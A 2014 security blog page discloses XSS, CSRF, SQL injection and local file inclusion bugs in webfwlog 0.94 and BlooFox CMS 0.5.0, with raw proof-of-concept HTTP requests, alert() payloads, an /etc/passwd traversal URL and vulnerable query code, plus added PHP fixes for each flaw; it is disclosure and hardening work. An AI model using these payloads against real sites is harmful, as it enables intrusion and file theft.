Friday 31 January 2014

[EN] webfwlog-0.94 bugs

In the last few days I found 2 XSS bugs in the Webfwlog Firewall Log Analyzer.

1st XSS is here:

---<request>---
GET /cms2/webfwlog-0.94/webfwlog/index.php?show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&restore=yes HTTP/1.1
Host: 10.149.14.58
(...)
Connection: close
---<request>---

Response should look like this:
---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
    <input type="submit" name="action" value="Select Data Source">
&nbsp;&nbsp;&nbsp;
---<response>---

2nd XSS is here:

---<request>---
POST /cms2/webfwlog-0.94/webfwlog/index.php HTTP/1.1
Host: 10.149.14.58
(...)
Content-Length: 173

page=home&report_order=Last+Accessed&show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&action=Select+Data+Source&ulog_table=&data_source=syslog&syslog_file=messages
---<request>---

And the response for this one:

---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
    <input type="submit" name="action" value="Select Data Source">
&nbsp;&nbsp;&nbsp;
---<response>---

So as we can see, this is the same parameter used (but not filtered) in two places.
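The fix for both places is the same: encode the parameter for the HTML attribute context before writing it into the page. The script below is an added example (PHP 7+), not webfwlog's own code; the helper names html_attr() and render_hidden_input() are assumptions. It takes the decoded value from the request above and shows the hidden field as index.php emits it next to the escaped form. The same rule applies to every other spot on this page where a request parameter lands in HTML, including the fileurl parameter of the bloofox editor page further down.

```php
<?php
// Added example (not webfwlog's code): render the hidden field from the
// response above with the value escaped for the attribute context. The
// helper names html_attr() and render_hidden_input() are assumptions.
declare(strict_types=1);

/**
 * Escape a string for use inside a double-quoted HTML attribute.
 * ENT_QUOTES converts both quote styles; ENT_SUBSTITUTE replaces invalid
 * UTF-8 instead of returning an empty string, which would silently drop data.
 */
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Build the hidden input that index.php emits, escaping name and value. */
function render_hidden_input(string $name, string $value): string
{
    return '<input type="hidden" name="' . html_attr($name)
        . '" value="' . html_attr($value) . '">';
}

// Constructed input: the show_select_data_source value from the request
// above, as PHP sees it in $_GET after URL decoding. In the real handler
// this would be $_GET['show_select_data_source'] ?? ''.
$value = '"><body/onload=alert(3)>';

echo "Original (unescaped): ",
    '<input type="hidden" name="show_select_data_source" value="' . $value . '">', PHP_EOL;
echo "Hardened (escaped):   ",
    render_hidden_input('show_select_data_source', $value), PHP_EOL;
```

In the hardened line the value becomes `&quot;&gt;&lt;body/onload=alert(3)&gt;`, so the browser keeps it inside the attribute as text instead of closing the tag and starting a new element.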

Anyway, cool code! ;)

[EN] BlooFox CMS 0.5.0 - Multiple vulnerabilities

In the last few days I saw that someone found a few vulnerabilities in the CMS I presented at my course.

I decided to check it again, and below you will find some information about it ;)

Enjoy.

All vulnerabilities were found with the admin user logged in. I didn't build the site ;)

1. Multiple XSS in MySQL error messages:

Parameters:
lang_id, blocked, tmpl_id, urls, mod_rewrite, meta_charset, meta_doctype, default_group,
u1, u2, u7, u4, u30, u40, u8, u3, u5, u9, u20, status, group_id, page, backend, content,
settings, permissions, tools, demo, object_w, object_d

Example request:
---<request>---
POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116

title=asdasd&text=asdasd&insert=top&blocked='"%3e%3cbody%2fonload%3dalert(3)%3e&startdate=&enddate=&send=Add+Article

---<request>---

And the response:
---<response>---
HTTP/1.1 200 OK
Date: Thu, 30 Jan 2014 12:46:16 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 448
Connection: close
Content-Type: text/html

</td></table><b>Database error:</b> Invalid SQL: INSERT INTO bfCMS_sys_content VALUES ('','','99965','','','asdasd','asdasd',''"><body/onload=alert(3)>','admin','1391085976','','','','')<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(3)>','admin','1391085976','','','','')' at line 1)<br>
<br>
Session halted.
---<response>---



2. CSRF (when adding a project)

---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host:
(...)
Content-Length: 229

name=asdasd&lang_id=1&tmpl_id=1&urls=<CSRF_IS_POSSIBLE_HERE>&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---
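The request above carries nothing that ties it to the admin's session, which is why a page on another site can submit it. The usual fix is a per-session token that every state-changing form includes and every handler checks before writing. The script below is an added example, not bloofox's code; $_SESSION is replaced by a plain array so it runs from the CLI, and the function names are assumptions.

```php
<?php
// Added example (not bloofox's code): a per-session anti-CSRF token for the
// "Add Project" form. $_SESSION is replaced by a plain array so the script
// runs from the CLI; the function names are assumptions.
declare(strict_types=1);

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to include in every state-changing form the site renders. */
function csrf_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

/**
 * Verify the token that arrived with a POST. hash_equals() compares in
 * constant time; a missing or non-string token fails closed.
 */
function csrf_check(array $session, array $post): bool
{
    if (empty($session['csrf_token'])
        || !isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Simulated session for the logged-in admin; rendering the form stores the token.
$session = [];
echo csrf_field($session), PHP_EOL;

// Constructed POST bodies. The first mirrors the request above, which carries
// no token (what a form on another site would submit); the second is what the
// site's own form submits.
$cross_site = ['name' => 'asdasd', 'lang_id' => '1', 'tmpl_id' => '1', 'urls' => 'example.invalid'];
$same_site  = $cross_site + ['csrf_token' => $session['csrf_token']];

foreach (['cross-site' => $cross_site, 'same-site' => $same_site] as $label => $post) {
    printf("%-10s request: %s\n", $label, csrf_check($session, $post) ? 'accepted' : 'rejected');
}
```

In the application the check runs at the top of every handler that reaches `$db->query("UPDATE ...")` or `INSERT`, before any field is read. Marking the session cookie `SameSite=Lax` or `Strict` is a cheap second layer, but the token is what actually closes the bug.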


3. Multiple SQL Injections

---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 263

name=asdasd&lang_id='"%3e%3cbody%2fonload%3dalert(3)%3e&tmpl_id=1&urls=asdasd&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---


Or here:

---<request>---
POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116

title=asdasd&text=asdasd&insert=top&blocked='HERE&startdate=&enddate=&send=Add+Article
---<request>---

Or here:

---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=plugins&action=edit HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 58

status='"%3e%3cbody%2fonload%3dalert(3)%3e&pid=1&send=Save
---<request>---


Parameters:
a) tmpl_id

---<code>---
./system/class_admincenter.php:119: $db->query("SELECT name FROM ".$tbl_prefix."sys_template WHERE tid = '".$tmpl_id."' ORDER BY tid");
---<code>---

b) urls

---<code>---
./admin/include/inc_settings_projects.php:130: $db->query("UPDATE ".$tbl_prefix."sys_config SET urls = '".$_POST['urls']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---

c) lang_id

---<code>---
./system/class_admincenter.php:104: $db->query("SELECT name FROM ".$tbl_prefix."sys_lang WHERE lid = '".$lang_id."' ORDER BY lid");
---<code>---

d) mod_rewrite

---<code>---
./admin/include/inc_settings_projects.php:146: $db->query("UPDATE ".$tbl_prefix."sys_config SET mod_rewrite = '".$_POST['mod_rewrite']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---

e) meta_charset

---<code>---
./admin/include/inc_settings_projects.php:142: $db->query("UPDATE ".$tbl_prefix."sys_config SET meta_charset = '".$_POST['meta_charset']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---

f) meta_doctype

---<code>---
./admin/include/inc_settings_projects.php:143: $db->query("UPDATE ".$tbl_prefix."sys_config SET meta_doctype = '".$_POST['meta_doctype']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");
---<code>---

g) default_group

---<code>---
./plugins/register_form_simple/register.php:121: $db2->query("SELECT name FROM ".$tbl_prefix."sys_usergroup WHERE gid = '".$sys_config_vars["default_group"]."' ORDER BY gid");
---<code>---

h) from 'u1' to 'u11' and also the u20, u30, u40 parameters:

---<code>---

k@lab:~/public_html/bloofox$ grep -n -r -e "UPDATE" ./ | grep "sys_setting SET setting_value =" | grep POST
./admin/include/inc_settings_general.php:27:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u1']."' WHERE sid = '1' LIMIT 1");
./admin/include/inc_settings_general.php:28:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u2']."' WHERE sid = '2' LIMIT 1");
./admin/include/inc_settings_general.php:29:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u3']."' WHERE sid = '3' LIMIT 1");
./admin/include/inc_settings_general.php:30:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u4']."' WHERE sid = '4' LIMIT 1");
./admin/include/inc_settings_general.php:31:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u5']."' WHERE sid = '5' LIMIT 1");
./admin/include/inc_settings_general.php:35:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u6']."' WHERE sid = '6' LIMIT 1");
./admin/include/inc_settings_general.php:41:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u7']."' WHERE sid = '7' LIMIT 1");
./admin/include/inc_settings_general.php:42:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u8']."' WHERE sid = '8' LIMIT 1");
./admin/include/inc_settings_general.php:43:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u9']."' WHERE sid = '9' LIMIT 1");
./admin/include/inc_settings_general.php:47:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u10']."' WHERE sid = '10' LIMIT 1");
./admin/include/inc_settings_general.php:57:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u12']."' WHERE sid = '12' LIMIT 1");
./admin/include/inc_settings_general.php:65:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u20']."' WHERE sid = '20' LIMIT 1");
./admin/include/inc_settings_general.php:66:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u30']."' WHERE sid = '30' LIMIT 1");
./admin/include/inc_settings_general.php:67:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u40']."' WHERE sid = '40' LIMIT 1");
k@lab:~/public_html/bloofox$
---<code>---

i) status

---<code>---
./admin/include/inc_user_user.php:434: $db->query("SELECT uid FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."'");
./admin/include/inc_user_user.php:442: $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."' ORDER BY uid LIMIT ".$start.",".$limit."");
---<code>---

j) pid

---<code>---
./admin/include/inc_settings_plugins.php:137: $db->query("SELECT pid,name,status FROM ".$tbl_prefix."sys_plugin WHERE pid = '".$_GET['pid']."' ORDER BY pid LIMIT 1");
---<code>---

Also:
backend, content, settings, permissions, tools, demo, object_w, object_d
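Every query quoted above builds its SQL by concatenating a request value into a quoted string, which is the whole bug. The script below is an added example, not bloofox's code: it rewrites two of those queries (the sys_template lookup from class_admincenter.php and a sys_setting update from inc_settings_general.php) with bound parameters, and feeds them the same payload the requests above send. It uses an in-memory SQLite database through PDO (pdo_sqlite) so it runs stand-alone; the table names follow the page, the column lists are assumptions.

```php
<?php
// Added example (not bloofox's code). Rewrites two queries quoted above with
// bound parameters, against an in-memory SQLite database via PDO so it runs
// stand-alone. Table names follow the page; the column lists are assumptions.
declare(strict_types=1);

$tbl_prefix = 'bfCMS_';

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE {$tbl_prefix}sys_template (tid INTEGER PRIMARY KEY, name TEXT NOT NULL)");
$db->exec("INSERT INTO {$tbl_prefix}sys_template (tid, name) VALUES (1, 'default'), (2, 'print')");
$db->exec("CREATE TABLE {$tbl_prefix}sys_setting (sid INTEGER PRIMARY KEY, setting_value TEXT)");
$db->exec("INSERT INTO {$tbl_prefix}sys_setting (sid, setting_value) VALUES (1, 'old value')");

/**
 * Look up a template name by id. The id is validated as a positive integer
 * before it reaches the database and travels as a bound parameter, never as
 * part of the SQL text. Returns null for anything that is not a valid id.
 */
function template_name(PDO $db, string $tbl_prefix, string $tmpl_id): ?string
{
    $tid = filter_var($tmpl_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($tid === false) {
        return null;
    }
    // $tbl_prefix comes from the application's config file, not from the request.
    $stmt = $db->prepare("SELECT name FROM {$tbl_prefix}sys_template WHERE tid = :tid ORDER BY tid");
    $stmt->bindValue(':tid', $tid, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string) $name;
}

/**
 * Store a free-text setting. The value may legitimately contain quotes, so it
 * is bound as a string; the row id is a fixed integer as in the original code.
 * (MySQL's "LIMIT 1" on UPDATE is dropped because SQLite does not accept it.)
 */
function set_setting(PDO $db, string $tbl_prefix, int $sid, string $value): int
{
    $stmt = $db->prepare("UPDATE {$tbl_prefix}sys_setting SET setting_value = :value WHERE sid = :sid");
    $stmt->bindValue(':value', $value, PDO::PARAM_STR);
    $stmt->bindValue(':sid', $sid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed inputs: two normal ids and the payload the page sends in tmpl_id/lang_id.
$payload = "'\"><body/onload=alert(3)>";
foreach (['1', '2', $payload] as $in) {
    $name = template_name($db, $tbl_prefix, $in);
    printf("tmpl_id=%-28s => %s\n", json_encode($in), $name ?? 'rejected, no query run');
}

// The same payload sent as setting u1 is stored verbatim instead of breaking the statement.
$rows = set_setting($db, $tbl_prefix, 1, $payload);
$stored = $db->query("SELECT setting_value FROM {$tbl_prefix}sys_setting WHERE sid = 1")->fetchColumn();
printf("rows updated: %d, stored value: %s\n", $rows, json_encode($stored));
```

Two details matter beyond the binding itself. Integer ids are validated before any query runs, so a non-numeric value never reaches the database at all; and with `PDO::ERRMODE_EXCEPTION` a failing statement throws, which should be caught, logged server-side and answered with a generic message. Echoing the failed SQL to the browser, as the "Database error: Invalid SQL: ..." response above does, is what turns the injection point into the reflected XSS from item 1.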

4. Local file include:
http://ip/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl=../../../../../../../../../../../../../../etc/passwd

Code:
---<code>---

k@lab:~/public_html/bloofox$ cat -n admin/include/inc_settings_editor.php |less
(...)

    60  if(isset($_GET["fileurl"])) {
    61          $fileurl = "../".$_GET["fileurl"];    [1]
    62  }
    63
    64  if(file_exists($fileurl)) {
    65          $filelength = filesize($fileurl);
    66          $readfile = fopen($fileurl,"r");    [2]
    67          $file = fread($readfile,$filelength);
    68          fclose($readfile);
    69  }

(...)
---<code>---
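Prefixing "../" at [1] does nothing to keep fileurl inside the editor's directory, and file_exists() at [2] happily accepts the traversal. The replacement below is an added example, not bloofox's code: it resolves the requested name with realpath() and serves the file only if the canonical path is still under an allowed root. The root directory, the helper names and the sandbox it builds in the system temp directory are assumptions; it runs stand-alone and cleans up after itself.

```php
<?php
// Added example (not bloofox's code): a replacement for the fileurl handling
// shown above. The editor root, helper names and sandbox are assumptions.
declare(strict_types=1);

/**
 * Resolve $relative inside $base and return the canonical path, or null if
 * the result would escape $base (traversal, symlink out of tree, missing file).
 */
function resolve_inside(string $base, string $relative): ?string
{
    $root = realpath($base);
    if ($root === false) {
        return null;
    }
    // Reject NUL bytes before touching the filesystem; PHP's file functions
    // would otherwise throw or truncate the name.
    if (strpos($relative, "\0") !== false) {
        return null;
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($candidate === false) {
        return null;
    }
    // The canonical path must start with "<root>/"; the root itself is not a file.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($candidate) ? $candidate : null;
}

/** Read a file the editor is allowed to show, or return null. */
function read_editor_file(string $base, string $fileurl): ?string
{
    $path = resolve_inside($base, $fileurl);
    if ($path === null) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// Constructed sandbox: a temporary editor root with one editable template.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'editor_root_' . bin2hex(random_bytes(4));
mkdir($base . '/templates', 0700, true);
file_put_contents($base . '/templates/index.tpl', "<h1>hello</h1>\n");

$requests = [
    'templates/index.tpl',                                  // legitimate request
    '../../../../../../../../../../../../../../etc/passwd', // the traversal from the page
    '/etc/passwd',                                          // absolute path
];
foreach ($requests as $fileurl) {
    $content = read_editor_file($base, $fileurl);
    printf("%-56s => %s\n", $fileurl,
        $content === null ? 'rejected' : 'served ' . strlen($content) . ' bytes');
}

// Remove the sandbox again.
unlink($base . '/templates/index.tpl');
rmdir($base . '/templates');
rmdir($base);
```

Only the first request is served; the traversal resolves to a path outside the root and the absolute path resolves to nothing under it, so both return null before any read happens. Comparing canonical paths is what makes this robust: stripping "../" from the string would leave symlinks and encoding variants to deal with.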



5. XSS over GET:
http://10.149.14.77/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl='><body onload=alert(1)>

And so on... ;)


I suggest you read this source.
It is really interesting. ;)

[EN] Simple Machine Forum (SMF) 2.0.7 - XSS

In the latest version of SMF I found a tricky XSS vulnerability.

As the vendor said, this is low priority, because it can be exploited
only when an admin user is logged in.

This post will be updated after the patch release (in the new version).


[EN] PrestaShop 1.5.6.2 - Multiple bugs

In the last few days I started to check the code of the latest PrestaShop, and I found a few vulnerabilities
in it.

This post will be updated as soon as the vendor answers with what they think about it.


[EN] osCommerce 3.0.2 - Multiple XSS

In the latest version of osCommerce (3.x line) I found a few XSS bugs.

As they are only exploitable when an admin user is logged in,
osCommerce Support said that this is a low priority bug.

They will not be published until the patch release.

By the way, I must say that the Support Team was very fast in replying to my message,
so big plus, guys! ;)